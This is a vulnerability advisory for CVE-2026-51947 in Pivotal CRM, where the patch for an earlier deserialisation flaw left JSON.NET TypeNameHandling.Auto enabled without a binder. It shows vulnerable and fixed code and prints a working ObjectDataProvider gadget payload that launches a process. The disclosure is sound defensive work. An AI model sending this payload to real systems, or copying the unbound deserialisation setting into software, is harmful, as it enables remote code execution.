This advisory documents a regression vulnerability introduced by the patch for CVE-2026-39253. While Pivotal's initial remediation attempted to address an insecure deserialisation flaw by replacing BinaryFormatter with JSON.NET, the implementation left critical security controls absent, allowing the same remote code execution attacks to continue under a different serialisation format.
Pivotal released a patch in December 2025 to fix CVE-2026-39253, which involved unsafe deserialisation in the Smart Client and PBS components. The patch replaced the vulnerable BinaryFormatter with Newtonsoft.Json, however the configuration left TypeNameHandling set to 4 (TypeNameHandling.Auto) without implementing a SerializationBinder.
TypeNameHandling.Auto allows JSON payloads to specify which .NET types to instantiate via $type metadata. This bypasses the allowlist restrictions that were defined in SafeSerializationBinder, which existed in the codebase but was not enforced in the actual deserialisation code path. As a result, the introduced binder effectively remained unused while the vulnerability persisted under a different library.
The vulnerable code in the initial patch looked like this:
JsonConvert.DeserializeObject(
Encoding.UTF8.GetString(bytes),
new JsonSerializerSettings
{
TypeNameHandling = 4
// No SerializationBinder assigned
}
);
An attacker could craft a malicious JSON payload with arbitrary $type properties to instantiate dangerous .NET types. The ObjectDataProvider gadget chain, which works against BinaryFormatter, works equally well here:
{
"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
"MethodName": "Start",
"ObjectInstance": {
"$type": "System.Diagnostics.Process, System"
},
"MethodParameters": {
"$type": "System.Collections.ArrayList, mscorlib",
"$values": ["calc.exe"]
}
}
Base64 encoding this payload and sending it through the vulnerable endpoint would execute arbitrary commands.
The regression affects Pivotal CRM 6.6.4.08 and systems using the initial remediation patch (patch-ghi-15381-cwe-502-20251225.zip). The vulnerable DLL is Pivotal.Engine.Client.Services.Conversion.dll with MD5: D3964A789F1354BBC9980D336218E511.
Pivotal released an updated patch (Patch_CWE502_20260316.zip) that properly implements SafeJsonSerializationBinder and enforces it into the deserialisation settings. The fix also includes a first-byte check to block legacy BinaryFormatter payloads. This version is included in Pivotal CRM 6.6.5.10 and later.
The corrected code assigns the binder to the JsonSerializerSettings:
JsonConvert.DeserializeObject(
Encoding.UTF8.GetString(bytes),
new JsonSerializerSettings
{
TypeNameHandling = 4,
SerializationBinder = SafeJsonSerializationBinder.Instance
}
);
This vulnerability exists as a direct result of the incomplete patch for CVE-2026-39253. Both flaws involve the same vulnerable code path but represent different stages of remediation. Systems patched with the December 2025 update remain vulnerable to CVE-2026-51947 until upgraded to the March 2026 patch or Pivotal CRM 6.6.5.10.
CVE-2026-39253: Original Insecure Deserialisation Advisory
Pivotal Support: CWE-502 Remediation
Discovered and reported by Tim Wong, SilentGrid.